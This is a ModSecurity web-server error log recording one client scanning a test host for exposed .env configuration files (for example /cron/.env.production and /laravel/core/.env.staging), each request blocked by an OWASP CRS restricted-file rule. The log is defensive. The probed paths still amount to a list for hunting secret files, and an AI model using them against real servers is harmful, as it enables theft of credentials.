[Thu Jan 08 21:18:34.027267 2026] [:error] [pid 1283304] [client 18.119.100.98:40970] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "aWARGmAwUIZgFNkik8yVSgAAAAg"]
[Thu Jan 08 21:18:34.027487 2026] [:error] [pid 1283304] [client 18.119.100.98:40970] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "aWARGmAwUIZgFNkik8yVSgAAAAg"]
[Thu Jan 08 21:18:34.027657 2026] [:error] [pid 1283304] [client 18.119.100.98:40970] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "aWARGmAwUIZgFNkik8yVSgAAAAg"]
[Thu Jan 08 21:18:34.375598 2026] [:error] [pid 1270042] [client 18.119.100.98:41062] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aWARGi7RlX2cRjHcFz6xzwAAAAY"]
[Thu Jan 08 21:18:34.375851 2026] [:error] [pid 1270042] [client 18.119.100.98:41062] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aWARGi7RlX2cRjHcFz6xzwAAAAY"]
[Thu Jan 08 21:18:34.376022 2026] [:error] [pid 1270042] [client 18.119.100.98:41062] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "aWARGi7RlX2cRjHcFz6xzwAAAAY"]
[Thu Jan 08 21:18:34.719442 2026] [:error] [pid 1270036] [client 18.119.100.98:41164] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "aWARGuM1154Q6b0hewij8wAAAAE"]
[Thu Jan 08 21:18:34.719651 2026] [:error] [pid 1270036] [client 18.119.100.98:41164] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "aWARGuM1154Q6b0hewij8wAAAAE"]
[Thu Jan 08 21:18:34.719801 2026] [:error] [pid 1270036] [client 18.119.100.98:41164] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "aWARGuM1154Q6b0hewij8wAAAAE"]
[Thu Jan 08 21:18:35.064254 2026] [:error] [pid 1270037] [client 18.119.100.98:41270] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWARG-A_IfWyU2EIiRhOkwAAAAI"]
[Thu Jan 08 21:18:35.064479 2026] [:error] [pid 1270037] [client 18.119.100.98:41270] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWARG-A_IfWyU2EIiRhOkwAAAAI"]
[Thu Jan 08 21:18:35.064648 2026] [:error] [pid 1270037] [client 18.119.100.98:41270] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWARG-A_IfWyU2EIiRhOkwAAAAI"]
[Thu Jan 08 21:18:35.416392 2026] [:error] [pid 1280390] [client 18.119.100.98:41380] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "aWARG9KTJIy7S9W5nL2LTgAAAAk"]
[Thu Jan 08 21:18:35.416619 2026] [:error] [pid 1280390] [client 18.119.100.98:41380] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "aWARG9KTJIy7S9W5nL2LTgAAAAk"]
[Thu Jan 08 21:18:35.416791 2026] [:error] [pid 1280390] [client 18.119.100.98:41380] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "aWARG9KTJIy7S9W5nL2LTgAAAAk"]
[Thu Jan 08 21:18:35.761973 2026] [:error] [pid 1270038] [client 18.119.100.98:41474] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aWARGxmwMJtANIcuNUXpMwAAAAM"]
[Thu Jan 08 21:18:35.762193 2026] [:error] [pid 1270038] [client 18.119.100.98:41474] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aWARGxmwMJtANIcuNUXpMwAAAAM"]
[Thu Jan 08 21:18:35.762375 2026] [:error] [pid 1270038] [client 18.119.100.98:41474] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aWARGxmwMJtANIcuNUXpMwAAAAM"]
[Thu Jan 08 21:18:36.107459 2026] [:error] [pid 1270039] [client 18.119.100.98:41578] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "aWARHJccQYhM1DUhi_W7GAAAAAQ"]
[Thu Jan 08 21:18:36.107667 2026] [:error] [pid 1270039] [client 18.119.100.98:41578] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "aWARHJccQYhM1DUhi_W7GAAAAAQ"]
[Thu Jan 08 21:18:36.107830 2026] [:error] [pid 1270039] [client 18.119.100.98:41578] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "aWARHJccQYhM1DUhi_W7GAAAAAQ"]
[Thu Jan 08 21:18:36.454559 2026] [:error] [pid 1270043] [client 18.119.100.98:41662] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "aWARHAvEr1EpOYnVfM6r0wAAAAc"]
[Thu Jan 08 21:18:36.454798 2026] [:error] [pid 1270043] [client 18.119.100.98:41662] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "aWARHAvEr1EpOYnVfM6r0wAAAAc"]
[Thu Jan 08 21:18:36.454962 2026] [:error] [pid 1270043] [client 18.119.100.98:41662] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "aWARHAvEr1EpOYnVfM6r0wAAAAc"]
[Thu Jan 08 21:18:36.800365 2026] [:error] [pid 1270035] [client 18.119.100.98:41770] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "aWARHCYqm_i2BUcmtQb4yAAAAAA"]
[Thu Jan 08 21:18:36.800581 2026] [:error] [pid 1270035] [client 18.119.100.98:41770] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "aWARHCYqm_i2BUcmtQb4yAAAAAA"]
[Thu Jan 08 21:18:36.800741 2026] [:error] [pid 1270035] [client 18.119.100.98:41770] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "aWARHCYqm_i2BUcmtQb4yAAAAAA"]
[Thu Jan 08 21:18:37.149863 2026] [:error] [pid 1270041] [client 18.119.100.98:41864] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "aWARHc3GwEx_BV8-CrWUVAAAAAU"]
[Thu Jan 08 21:18:37.150084 2026] [:error] [pid 1270041] [client 18.119.100.98:41864] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "aWARHc3GwEx_BV8-CrWUVAAAAAU"]
[Thu Jan 08 21:18:37.150270 2026] [:error] [pid 1270041] [client 18.119.100.98:41864] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "aWARHc3GwEx_BV8-CrWUVAAAAAU"]
[Thu Jan 08 21:18:37.500844 2026] [:error] [pid 1283304] [client 18.119.100.98:41972] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /media/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "aWARHWAwUIZgFNkik8yVSwAAAAg"]
[Thu Jan 08 21:18:37.501070 2026] [:error] [pid 1283304] [client 18.119.100.98:41972] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "aWARHWAwUIZgFNkik8yVSwAAAAg"]
[Thu Jan 08 21:18:37.501224 2026] [:error] [pid 1283304] [client 18.119.100.98:41972] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "aWARHWAwUIZgFNkik8yVSwAAAAg"]
[Thu Jan 08 21:18:37.849416 2026] [:error] [pid 1270042] [client 18.119.100.98:42080] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "aWARHS7RlX2cRjHcFz6x0AAAAAY"]
[Thu Jan 08 21:18:37.849683 2026] [:error] [pid 1270042] [client 18.119.100.98:42080] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "aWARHS7RlX2cRjHcFz6x0AAAAAY"]
[Thu Jan 08 21:18:37.849858 2026] [:error] [pid 1270042] [client 18.119.100.98:42080] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "aWARHS7RlX2cRjHcFz6x0AAAAAY"]
[Thu Jan 08 21:18:38.198169 2026] [:error] [pid 1270036] [client 18.119.100.98:42188] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "aWARHuM1154Q6b0hewij9AAAAAE"]
[Thu Jan 08 21:18:38.198403 2026] [:error] [pid 1270036] [client 18.119.100.98:42188] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "aWARHuM1154Q6b0hewij9AAAAAE"]
[Thu Jan 08 21:18:38.198562 2026] [:error] [pid 1270036] [client 18.119.100.98:42188] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "aWARHuM1154Q6b0hewij9AAAAAE"]
[Thu Jan 08 21:18:38.543964 2026] [:error] [pid 1270037] [client 18.119.100.98:42282] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "aWARHuA_IfWyU2EIiRhOlAAAAAI"]
